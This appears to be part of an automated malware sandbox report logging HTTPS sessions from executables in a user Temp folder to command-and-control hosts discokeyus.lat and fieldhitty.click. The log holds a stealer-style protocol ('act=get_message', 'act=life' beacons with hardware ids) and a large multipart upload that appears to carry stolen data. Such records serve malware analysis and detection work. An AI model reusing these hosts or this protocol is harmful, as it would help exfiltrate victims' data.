                                                                                                                                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                              Content-Length: 82
                                                                                                                                                                                                                                                              Host: discokeyus.lat
                                                                                                                                                                                                                                                              2024-12-22 01:18:40 UTC82OUTData Raw: 61 63 74 3d 67 65 74 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 50 73 46 4b 44 67 2d 2d 70 61 62 6c 6f 26 6a 3d 26 68 77 69 64 3d 46 31 34 31 39 35 41 35 34 30 42 43 30 42 39 38 41 43 38 39 32 33 38 35 30 33 30 35 44 31 33 45
                                                                                                                                                                                                                                                              Data Ascii: act=get_message&ver=4.0&lid=PsFKDg--pablo&j=&hwid=F14195A540BC0B98AC8923850305D13E
                                                                                                                                                                                                                                                              2024-12-22 01:18:41 UTC1129INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                              Date: Sun, 22 Dec 2024 01:18:41 GMT
                                                                                                                                                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                              Set-Cookie: PHPSESSID=s01gg5ffdbudbknfvmsbc9n8rs; expires=Wed, 16 Apr 2025 19:05:20 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                                                                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                                                                              Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                                                                              Pragma: no-cache
                                                                                                                                                                                                                                                              X-Frame-Options: DENY
                                                                                                                                                                                                                                                              X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                              X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                                              cf-cache-status: DYNAMIC
                                                                                                                                                                                                                                                              vary: accept-encoding
                                                                                                                                                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=674dLbe0Y0ID4CeHq%2BLYJo60ikvbS2nEboDN6BEwUt7kS2t8m%2B3EFV3qgpfYk1vW6b9fP0MjMKf4KgJx%2BB0WeXITAINxbCiR%2FA%2BjpgUGXkzfBm0R6tcR8yRjX8dWer9j2w%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                              Server: cloudflare
                                                                                                                                                                                                                                                              CF-RAY: 8f5c47832b9e7298-EWR
                                                                                                                                                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1973&min_rtt=1968&rtt_var=749&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2831&recv_bytes=980&delivery_rate=1451292&cwnd=173&unsent_bytes=0&cid=1372b7458dca7e90&ts=792&x=0"
                                                                                                                                                                                                                                                              2024-12-22 01:18:41 UTC214INData Raw: 64 30 0d 0a 65 6b 76 49 43 65 70 74 4e 53 62 53 6e 77 39 37 69 42 72 4d 48 31 62 76 63 6e 76 62 6b 78 57 6a 6c 59 55 54 6d 72 56 68 47 67 63 68 4d 4f 70 38 79 46 63 58 54 71 62 72 66 30 48 55 4e 5a 41 77 5a 39 64 48 56 65 6d 69 49 49 32 6b 74 43 43 30 68 46 64 47 4b 42 55 74 72 6c 58 46 43 56 42 41 2f 50 70 33 48 71 6f 32 37 6e 6b 69 7a 55 68 4c 39 37 46 77 67 61 2b 31 62 72 62 4f 51 32 38 6c 51 47 6d 67 66 5a 34 64 44 33 72 39 77 79 42 4b 73 43 2f 69 4c 57 66 61 58 45 72 71 6f 44 75 53 6f 39 6b 38 36 63 45 45 65 32 6f 6d 5a 4c 70 6f 68 41 6c 61 53 2f 7a 36 64 78 36 71 4e 75 35 35 49 73 31 49 53 2f 65 78 63 49 47 76 74 57 37 48 0d 0a
                                                                                                                                                                                                                                                              Data Ascii: d0ekvICeptNSbSnw97iBrMH1bvcnvbkxWjlYUTmrVhGgchMOp8yFcXTqbrf0HUNZAwZ9dHVemiII2ktCC0hFdGKBUtrlXFCVBA/Pp3Hqo27nkizUhL97Fwga+1brbOQ28lQGmgfZ4dD3r9wyBKsC/iLWfaXErqoDuSo9k86cEEe2omZLpohAlaS/z6dx6qNu55Is1IS/excIGvtW7H
                                                                                                                                                                                                                                                              2024-12-22 01:18:41 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                              Data Ascii: 0


                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                              39192.168.2.450177104.21.21.99443348C:\Users\user\AppData\Local\Temp\1019809001\142c991362.exe
                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                              2024-12-22 01:18:42 UTC272OUTPOST /api HTTP/1.1
                                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                                              Content-Type: multipart/form-data; boundary=E390UQ9J5
                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                              Content-Length: 549707
                                                                                                                                                                                                                                                              Host: discokeyus.lat
                                                                                                                                                                                                                                                              2024-12-22 01:18:42 UTC15331OUTData Raw: 2d 2d 45 33 39 30 55 51 39 4a 35 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 46 31 34 31 39 35 41 35 34 30 42 43 30 42 39 38 41 43 38 39 32 33 38 35 30 33 30 35 44 31 33 45 0d 0a 2d 2d 45 33 39 30 55 51 39 4a 35 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 45 33 39 30 55 51 39 4a 35 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 50 73 46 4b 44 67 2d 2d 70 61 62 6c 6f 0d 0a 2d 2d 45 33 39 30 55 51 39 4a 35 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70
                                                                                                                                                                                                                                                              Data Ascii: --E390UQ9J5Content-Disposition: form-data; name="hwid"F14195A540BC0B98AC8923850305D13E--E390UQ9J5Content-Disposition: form-data; name="pid"1--E390UQ9J5Content-Disposition: form-data; name="lid"PsFKDg--pablo--E390UQ9J5Content-Disp
                                                                                                                                                                                                                                                              2024-12-22 01:18:42 UTC15331OUTData Raw: 89 ee 65 1b 3f 30 f9 14 38 1e 4e 55 be 7f 1e 01 f5 86 28 0d 85 ef c6 0d 03 9e e4 98 58 ff 9f cb 08 fb 2a 80 26 2e e7 66 5b fc 65 c0 f6 49 3e 3a 8d ad 20 66 ba 40 f7 34 16 88 5d 51 87 95 f2 09 c9 21 be 05 67 9d 05 05 02 a4 89 eb 37 c6 4f c4 09 d0 e6 8b d5 a7 e2 ef 84 db 6d 44 04 1c 0b db cb 30 fa 43 c8 d6 d9 f9 20 ca 38 08 af 0f 4a 3a 82 fc 27 f3 20 38 1b aa 94 c2 1f 69 86 0b f7 03 07 ad 4e 40 ae e6 79 0b 22 d5 37 2e 2d 0a dc f8 b7 e5 e3 80 4b df 58 df bb b4 11 fb 21 a7 77 e8 50 cd fa 8d ab 54 a8 c0 be a2 c3 a4 e4 6a 62 88 eb 64 5a 14 0a ee dd ef 23 62 84 09 45 a6 9d 18 9a 96 83 01 49 fe f1 d4 5c 50 1c ec e8 b2 e6 d0 a0 81 9f 0e 58 3a f8 be 4f 0f 6c 37 96 df 7d 73 6a 74 f0 e2 ee 7e ef 1b 27 7b a5 7b 27 c7 14 ed df 3a 94 54 65 bf b1 a9 28 f8 ef 62 da ec e1
                                                                                                                                                                                                                                                              Data Ascii: e?08NU(X*&.f[eI>: f@4]Q!g7OmD0C 8J:' 8iN@y"7.-KX!wPTjbdZ#bEI\PX:Ol7}sjt~'{{':Te(b
                                                                                                                                                                                                                                                              2024-12-22 01:18:42 UTC15331OUTData Raw: 72 52 97 96 5a 27 52 ea 25 ba 30 b5 5a 0a 6f 5b 83 f1 01 c3 b5 54 13 ee f7 8f e3 71 65 a3 93 d3 d3 d1 75 fa 13 4a ce 2a 60 a7 63 04 44 90 db 87 a7 5a 06 12 55 94 14 23 e2 7e bd 3f 71 4c 3e d2 c0 a9 cb 10 e7 77 5c 85 cf 8f 97 af d6 d5 c1 3d 6a 2c fb f5 2e 83 c0 7f 57 cd 7a 5a e0 55 09 0f 8f e6 e7 11 8f 45 f3 0b ad 29 f5 2d 09 ed 6c 92 d3 7e b5 51 fb 28 8e 20 87 12 da 83 33 79 a8 bb 24 5e a9 f2 4a 30 b5 e5 4e 68 ed 9e fc 49 b9 7e fe ef ea 59 93 57 46 7f 9f 8d be 9a 1e b2 8f ef 6e 90 68 1f b5 d9 f0 79 63 34 ec 2f fe 4b b1 76 2a 84 1f fd 93 d9 bd ee 74 c5 ef 51 a6 21 a2 33 4b 34 2b b7 45 56 68 7d 38 f6 d8 10 d4 1d b5 25 f2 74 47 81 4a 3a 4b 79 82 97 2e 92 21 f1 82 1d 2c 9a 2e c6 1c df 9c e5 76 bf e7 e8 b7 9a e0 3d f4 7f ed 30 6d ed a4 3f 28 81 f8 17 65 17 af
                                                                                                                                                                                                                                                              Data Ascii: rRZ'R%0Zo[TqeuJ*`cDZU#~?qL>w\=j,.WzZUE)-l~Q( 3y$^J0NhI~YWFnhyc4/Kv*tQ!3K4+EVh}8%tGJ:Ky.!,.v=0m?(e
                                                                                                                                                                                                                                                              2024-12-22 01:18:42 UTC15331OUTData Raw: 2a c6 2e bb b9 9b 1e 65 fd e9 d9 de 4f 68 98 51 b9 e4 72 60 e3 45 bf 40 4f 66 c5 e7 91 9a 8a 97 ff b0 98 dc fc d8 d3 d5 53 2b 7f 9c 98 d4 e6 73 42 5d 63 3f b7 7e 53 7d 8d dd 6d 5e 71 ae 7d da 9f 49 cd db 0b 1c 85 8b 00 e6 d6 69 e0 78 61 07 cf 4e 9d 5e d9 42 61 96 db b0 04 ab f4 40 1b 87 a3 8e 0f b7 f9 ba fe e8 5e 84 d5 84 dc 64 81 34 90 8d 09 b9 e5 35 0f d1 ed 42 ed 0d 3e a8 e3 67 7a df 90 db 4c 9e 86 5b 68 01 87 8f bf 36 10 1f 61 0a 3c e4 ff bf 23 d0 91 cc 51 08 94 a1 a1 26 03 70 ad 2c 17 11 59 12 91 9a a5 28 70 21 e4 a9 36 df 1a 5d 5c 15 fb ea 95 e2 90 d6 0f 40 d8 43 74 c4 3c c3 12 bf 4c ba 7a 70 03 8b 9f 18 46 a9 a0 40 e2 47 4e 88 4d 84 4d 62 a8 61 93 55 69 10 6d 7c b6 71 c1 d5 80 75 97 ee 7a e3 a6 71 ef 8c e1 5a 1f 31 26 72 30 47 80 7e 46 06 46 13 7c
                                                                                                                                                                                                                                                              Data Ascii: *.eOhQr`E@OfS+sB]c?~S}m^q}IixaN^Ba@^d45B>gzL[h6a<#Q&p,Y(p!6]\@Ct<LzpF@GNMMbaUim|quzqZ1&r0G~FF|
                                                                                                                                                                                                                                                              2024-12-22 01:18:42 UTC15331OUTData Raw: ff 8b 0a 97 e9 cb f3 5e da f6 34 c2 3c 5f 46 be 76 01 4c 25 cc 09 79 35 bf c7 8c 65 24 9a da 13 ff 8d 44 a0 a9 a1 62 7b a4 b1 f3 28 4f b4 79 3b ca dc 49 e3 d7 65 fc 4b bf ad f7 20 ba e3 5c 00 ab 0f 41 62 19 01 4c df 74 ba cd 9a 99 dd 79 72 f5 04 e7 9a 01 1e 3f a5 1b fc 55 32 10 cb 83 11 c6 f4 2a 8c a3 19 51 45 dd 46 73 b2 1f ac 19 4d c6 d8 70 a1 46 79 2b f7 4c a7 a4 d1 91 f1 3b 33 43 15 f1 9b 2f 05 28 fc 9c 3b a3 c1 d8 7a 52 ed 75 26 33 e2 ef 41 72 9d 44 a4 71 1d 82 1d 08 93 28 47 5d 22 d2 fa d0 8c b8 72 f5 74 f8 1e df d2 53 3e 15 c9 64 4b fb 8c 04 9c 90 e0 7e 46 c9 9e 5d 3a 5c d2 77 59 d3 1b cf 24 22 0f f3 99 54 fd 58 69 d2 ba b9 9a d9 ba c5 1d d6 a4 83 11 02 af 07 d4 c6 b3 de 70 81 3f 5f c7 9e 44 d6 18 e9 66 25 f0 0a 81 db 13 d0 e2 39 d3 cc 04 d1 d8 e7
                                                                                                                                                                                                                                                              Data Ascii: ^4<_FvL%y5e$Db{(Oy;IeK \AbLtyr?U2*QEFsMpFy+L;3C/(;zRu&3ArDq(G]"rtS>dK~F]:\wY$"TXip?_Df%9
                                                                                                                                                                                                                                                              2024-12-22 01:18:42 UTC15331OUTData Raw: c5 91 be 3d 8c 7a 7e 58 56 14 38 36 c9 0d 45 ea 7c fd b6 64 99 5e d1 d1 14 cf b9 22 2c fe e3 6f 6e 87 2b f6 0e 1c e4 0f 9d c0 84 fa a3 7e 2c e0 62 b3 ea 4c 68 e6 61 13 21 12 9c f9 27 81 95 5e ac 04 95 6b e3 60 d9 37 bd a2 30 7b b7 0c 6c 88 81 5f 72 b1 eb a3 44 07 db 5e 9d 25 56 d7 77 4b d8 5e 78 e1 c5 d3 ff 1d a6 b9 9e 81 bd c3 25 2d 42 7f 85 d8 89 aa 32 91 54 d8 66 ac 56 94 65 b7 ae 56 fb 0c 65 a8 fb 61 de eb 83 fb b3 cf 5c 40 df 5c 63 9c d9 99 29 72 15 ba 49 55 d7 5c 46 cf a2 97 73 66 6c 8e 92 e9 ac 25 55 da 18 00 6f d1 8c 79 56 1f 29 4d 04 10 f6 88 45 29 71 b3 1b b6 d7 06 ff 5d 97 1c a9 61 76 4e fd 4c 90 3b ee 0c ef 03 0d 2a 3b fb 1d 66 5b 20 0c 38 24 c5 90 6f 80 a9 61 97 b8 c0 03 71 86 1e 22 ed ee 5e df f7 7e 6b f6 6e 13 93 2a c4 de f8 b5 55 49 cb f2
                                                                                                                                                                                                                                                              Data Ascii: =z~XV86E|d^",on+~,bLha!'^k`70{l_rD^%VwK^x%-B2TfVeVea\@\c)rIU\Fsfl%UoyV)ME)q]avNL;*;f[ 8$oaq"^~kn*UI
                                                                                                                                                                                                                                                              2024-12-22 01:18:42 UTC15331OUTData Raw: ca 8a 7f da 45 1c 01 86 4d e1 10 76 14 17 35 39 e2 a3 f5 fc e3 58 bc cb 9d c0 6f 47 1e 2d 6d 65 7a 19 ef 13 d9 f0 72 14 50 a8 ee 79 e9 8d 29 1a be 8c c3 23 be ff 4e c7 8e 15 2f 98 93 f8 bf 6e b6 23 ea 80 b4 53 95 d1 cd 6c f3 54 df 27 0e ae fc 93 ba 23 d6 99 07 51 24 08 13 4a 7b ec 91 63 f3 b5 10 98 7d 16 0a 11 e5 b2 94 21 47 e1 de 93 1c ad 73 69 dc 7b 3d e8 98 3e bc cb 45 62 20 ef fd 48 8b b6 4d cd 5a d1 2c 0f b9 92 35 cd cc 11 ea 14 0d 77 91 2c 8e a8 3e 02 2c 46 33 35 50 df b1 bd 7f 69 c3 15 0d 57 71 90 5a 03 36 f6 6a 64 39 64 ed 68 2f 01 78 6a 9c 20 e2 50 08 9e 55 ec 9c 9d 25 32 c9 3a 3c f8 fd 0a a5 72 d7 6d 25 e6 c8 04 cb 52 2c 0b 1b f6 f3 57 ab ff ef 02 5f e6 61 66 49 f1 31 e1 85 cb 31 99 3a 18 e3 f3 64 5f de 59 99 38 43 71 2c 47 1a 7a 3d 12 37 5b 1c
                                                                                                                                                                                                                                                              Data Ascii: EMv59XoG-mezrPy)#N/n#SlT'#Q$J{c}!Gsi{=>Eb HMZ,5w,>,F35PiWqZ6jd9dh/xj PU%2:<rm%R,W_afI11:d_Y8Cq,Gz=7[
                                                                                                                                                                                                                                                              2024-12-22 01:18:42 UTC15331OUTData Raw: 83 c3 f9 8b 06 36 bd d9 c5 1d ed e8 b6 3f 86 82 41 e0 11 94 e1 b0 b7 f4 52 b1 5c ca 88 cb a9 4d 69 84 e7 b2 73 a6 71 13 fa 14 22 34 12 eb 85 54 a7 ae 66 a7 ee 7a 83 01 2e e7 d7 e5 58 f1 ce 78 f9 e0 ef be b0 36 be 38 e9 9b ef 50 fe b5 a9 0c 96 de 8e bd 2c 22 a3 09 dd 24 ab 88 60 2a f6 1a 24 6c 54 71 08 f7 72 4c f7 f7 8f 44 51 14 46 6f ad 92 2b 8f 73 f4 ea ab b9 29 ff 80 1e 45 48 c3 e8 98 d6 4a f5 b2 87 b5 25 4e 4c 64 58 7d 4a 08 e7 f6 f1 27 17 58 95 0e 4e 1d c9 3d 12 9a 7c e4 e4 f9 7f a7 cd 58 a4 75 d1 1d 76 44 c9 37 b6 d8 b6 59 b9 a8 95 9e d3 50 46 b6 4f e2 ce 8b 4b d3 86 a3 9f ec a0 cf 3c 4f e0 b3 58 30 2f dc 97 7e 0e 68 2d 1c 20 96 20 10 47 79 37 65 fb af a4 0d 60 01 39 1c 3a c7 07 ca ad dc 7f 79 bb 9f 7c 02 3a 8f 70 62 6c d2 22 f2 4f dd f2 20 3a 35 38
                                                                                                                                                                                                                                                              Data Ascii: 6?AR\Misq"4Tfz.Xx68P,"$`*$lTqrLDQFo+s)EHJ%NLdX}J'XN=|XuvD7YPFOK<OX0/~h- Gy7e`9:y|:pbl"O :58
                                                                                                                                                                                                                                                              2024-12-22 01:18:42 UTC15331OUTData Raw: d4 2e 43 54 87 7e e4 8f 77 be 5b 97 b5 e5 27 aa cd 09 9a 02 40 02 2b 95 ea 9e a7 46 58 d0 d3 33 42 1f bd db a0 3f 74 62 c0 37 fd 49 6b f7 e7 87 f9 66 82 bc 5b f3 f6 9f 8c a8 ff bb 25 26 08 42 7c 16 17 d1 40 1b 7f 05 07 de a2 0b 05 50 c3 64 b2 e4 3f c1 69 da 3e 89 9b c7 6a 2c 8d f9 7d 75 10 0c 18 70 82 9c 23 4b ed 45 d1 03 1c 0a 95 86 b9 92 87 fb a5 46 5c e3 b1 23 aa 74 01 8c 36 cb 33 9a 1a 0c f0 eb 8f 59 63 2b 80 4f c5 7c f0 b8 c8 9b ad b8 7d d3 56 68 5e 3b 1f 3e 33 67 aa e6 c4 a9 cd 67 15 a9 c6 bc 82 63 e2 f7 20 d8 a8 5b 7f fd 8a 83 04 ea 7a c2 04 04 6e 10 70 0d b8 7a e5 a8 90 dd 54 7e 00 e1 a0 15 e2 de d0 9d 5c bb d6 9c 59 b2 8b 8d a9 d3 08 f6 b2 25 de 03 f3 1a 9d 44 48 3a 58 63 8c 4e da 44 14 e0 b6 cf e6 24 d0 05 04 7e 4d d9 14 da d8 da 06 66 ee 8d 2d
                                                                                                                                                                                                                                                              Data Ascii: .CT~w['@+FX3B?tb7Ikf[%&B|@Pd?i>j,}up#KEF\#t63Yc+O|}Vh^;>3ggc [znpzT~\Y%DH:XcND$~Mf-
                                                                                                                                                                                                                                                              2024-12-22 01:18:42 UTC15331OUTData Raw: 11 f4 97 37 25 27 4c 2d 3f 45 f3 6f f0 f9 10 d0 b5 d7 d1 84 33 fc d7 24 05 1d e7 f5 69 02 5f ed ff ef a5 37 d6 71 7a 27 33 21 3e 26 b1 6c a7 21 2f f3 ae 9a 97 20 e2 8d 59 f4 58 63 22 60 d8 1d 05 f9 87 67 54 a0 fc 5f 66 4c 77 87 e1 8b 57 bf 88 56 ee bc 59 cc d6 40 40 e4 17 d7 d4 d3 de ac ab f9 e1 8c 84 fc a5 9a 09 97 29 78 a2 b6 89 54 81 56 17 b0 6c dd 11 7a 14 86 61 6a 50 8c 5a a1 29 ce db fd fa 72 91 4a ca 04 80 9d 1c bd e3 fc 8d 21 df d9 81 9e 1e d2 07 5c e7 0f 8c d6 84 f7 dc 16 70 0c 5a 78 35 6f af 42 6c a1 67 79 0c 56 ca 0d 96 dc 75 c9 17 5b 18 08 93 8a f4 6e 56 ee 18 5b 2a d6 a6 47 51 eb 66 3d f2 42 10 ee 05 8c fd b9 3e f6 8a 30 08 f1 9e 9b 95 87 c3 fc a0 d7 9a 49 13 1f f6 a4 c0 a2 8e 9f a8 92 ac d9 be 0a ee 7b c9 20 a7 dd 64 1b 96 c7 08 b4 fe 5c d3
                                                                                                                                                                                                                                                              Data Ascii: 7%'L-?Eo3$i_7qz'3!>&l!/ YXc"`gT_fLwWVY@@)xTVlzajPZ)rJ!\pZx5oBlgyVu[nV[*GQf=B>0I{ d\
                                                                                                                                                                                                                                                              2024-12-22 01:18:45 UTC1129INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                              Date: Sun, 22 Dec 2024 01:18:45 GMT
                                                                                                                                                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                              Set-Cookie: PHPSESSID=fouhhvmrvlrv8bdbu7puoeoeeg; expires=Wed, 16 Apr 2025 19:05:23 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                                                                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                                                                              Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                                                                              Pragma: no-cache
                                                                                                                                                                                                                                                              X-Frame-Options: DENY
                                                                                                                                                                                                                                                              X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                              X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                                              cf-cache-status: DYNAMIC
                                                                                                                                                                                                                                                              vary: accept-encoding
                                                                                                                                                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=qW39Gyex9Fwi8P2L3APoxqAxtUU6zY9UEOxW1VuyoGZFPu8h4g0xUHZo2sWTtEYPofmvP7ZK6kOWmdaUNkyhMT8Qx69x4Y96ogvUewjcx9bXOCXpGzysrb7%2BX96vBlhlpQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                              Server: cloudflare
                                                                                                                                                                                                                                                              CF-RAY: 8f5c478cefcc41e9-EWR
                                                                                                                                                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1593&min_rtt=1587&rtt_var=607&sent=316&recv=573&lost=0&retrans=0&sent_bytes=2832&recv_bytes=552177&delivery_rate=1784841&cwnd=249&unsent_bytes=0&cid=628a1769cf4f1bcd&ts=3146&x=0"


                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                              40192.168.2.450180104.21.21.99443
                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                              2024-12-22 01:18:44 UTC261OUTPOST /api HTTP/1.1
                                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                              Content-Length: 8
                                                                                                                                                                                                                                                              Host: discokeyus.lat
                                                                                                                                                                                                                                                              2024-12-22 01:18:44 UTC8OUTData Raw: 61 63 74 3d 6c 69 66 65
                                                                                                                                                                                                                                                              Data Ascii: act=life
                                                                                                                                                                                                                                                              2024-12-22 01:18:45 UTC1126INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                              Date: Sun, 22 Dec 2024 01:18:45 GMT
                                                                                                                                                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                              Set-Cookie: PHPSESSID=kpouo2bqq2atuo717ifa0dp6hc; expires=Wed, 16 Apr 2025 19:05:24 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                                                                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                                                                              Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                                                                              Pragma: no-cache
                                                                                                                                                                                                                                                              X-Frame-Options: DENY
                                                                                                                                                                                                                                                              X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                              X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                                              cf-cache-status: DYNAMIC
                                                                                                                                                                                                                                                              vary: accept-encoding
                                                                                                                                                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=NSvsFpvHAu%2FDijvL5FPT1TvZq8sFsO631zpzXYys2YU07OvWs%2Fy4tPb0GVBxP47jdVv0ARkhj74qID7OnJ4GFHXbUcs%2Btt1JdJ5ZF36y2xVSderqm8iOpEHWi9TuygQF7A%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                              Server: cloudflare
                                                                                                                                                                                                                                                              CF-RAY: 8f5c47995ce4729b-EWR
                                                                                                                                                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1947&min_rtt=1942&rtt_var=738&sent=6&recv=7&lost=0&retrans=0&sent_bytes=2832&recv_bytes=905&delivery_rate=1471774&cwnd=249&unsent_bytes=0&cid=08552b0840fd8446&ts=1187&x=0"
                                                                                                                                                                                                                                                              2024-12-22 01:18:45 UTC7INData Raw: 32 0d 0a 6f 6b 0d 0a
                                                                                                                                                                                                                                                              Data Ascii: 2ok
                                                                                                                                                                                                                                                              2024-12-22 01:18:45 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                              Data Ascii: 0


                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                              41192.168.2.450185104.21.89.1154437796C:\Users\user\AppData\Local\Temp\1019800001\af155ed129.exe
                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                              2024-12-22 01:18:47 UTC263OUTPOST /api HTTP/1.1
                                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                              Content-Length: 8
                                                                                                                                                                                                                                                              Host: fieldhitty.click
                                                                                                                                                                                                                                                              2024-12-22 01:18:47 UTC8OUTData Raw: 61 63 74 3d 6c 69 66 65
                                                                                                                                                                                                                                                              Data Ascii: act=life
                                                                                                                                                                                                                                                              2024-12-22 01:18:47 UTC1116INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                              Date: Sun, 22 Dec 2024 01:18:47 GMT
                                                                                                                                                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                              Set-Cookie: PHPSESSID=mv468l6hcpsa102jcihn77efaa; expires=Wed, 16 Apr 2025 19:05:26 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                                                                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                                                                              Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                                                                              Pragma: no-cache
                                                                                                                                                                                                                                                              X-Frame-Options: DENY
                                                                                                                                                                                                                                                              X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                              X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                                              cf-cache-status: DYNAMIC
                                                                                                                                                                                                                                                              vary: accept-encoding
                                                                                                                                                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=cnDjbyCNelGZr8royR3IxMjhw9avh3JkDEOuzbZmSxitXLUNAr8NR6Dru7h7tQFAfZWJdqx6myMzZFmlPadTaUKfyknVb7WyQFme5Ou9noqw0jz1C4mrwvC5q1pWMODdVRqJ"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                              Server: cloudflare
                                                                                                                                                                                                                                                              CF-RAY: 8f5c47a9abd641e6-EWR
                                                                                                                                                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1607&min_rtt=1604&rtt_var=608&sent=6&recv=8&lost=0&retrans=0&sent_bytes=2837&recv_bytes=907&delivery_rate=1788120&cwnd=182&unsent_bytes=0&cid=756456bfef691853&ts=1024&x=0"
                                                                                                                                                                                                                                                              2024-12-22 01:18:47 UTC7INData Raw: 32 0d 0a 6f 6b 0d 0a
                                                                                                                                                                                                                                                              Data Ascii: 2ok
